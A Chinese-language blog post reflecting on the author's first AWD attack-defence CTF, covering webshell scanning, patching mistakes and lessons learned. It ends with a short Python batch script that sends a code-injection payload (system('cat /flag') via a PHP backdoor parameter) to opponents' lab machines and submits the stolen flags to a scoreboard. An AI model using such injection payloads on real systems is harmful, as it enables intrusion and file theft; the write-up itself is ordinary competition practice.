awd

awd

十一月 23, 2021

因为是第一次打awd,写点东西总结一下

准备

其实在打awd之前就写了个批量脚本,准备了流量监控脚本。但是因为批量脚本报错,心开始慌乱,所以比赛开始前期的flag都是手提的。

开始

在拿到网站的时候第一件事情就是改密码,由于我们这次是随机密码,被其他队猜到的可能性不大,所以就没有改,直接拖下源码,d盾扫一句话,进攻其他队,同时防御。我和我队友配合的比较好,他手提flag,我找洞修洞

转折

后来学长也加进来了,我们的站就经常被删,这时候的心态就有点小炸,因为洞是在靶机上修的,每次把源码拖上去的时候就还是带漏洞,就搞不清楚那些洞修了哪些没修,没想到在本地先修在上传,最后就寄了

总结

在优势的情况下,没有继续挖洞,修洞保持优势。删站的时候动作幅度太大,把整个文件夹都删了,容易被被删站的人发现。没有上流量监控脚本,看其他人打我们的exp从而进行反击

附上批量脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
url =" http://172.17.135.39:{}/App/Api/nothing.php?a=system('cat /flag');"
for i in (8001,8010):
   try:
     url2=url.format(i)
     # playload={"a":"system('cat /flag')"}
     g=requests.get(url=url2)
     flag=g.text
     print(flag)
     url3='http://172.17.135.26:19999/#/'
     header={'Authorization':'b67f4335dd35fc53718d46bef5be9361','Content-Type':'application/json'}
     flag={'flag':flag}
     y=requests.post(url=url3,headers=header,json=flag)
     print(y.text)

   except:
     print('no flag')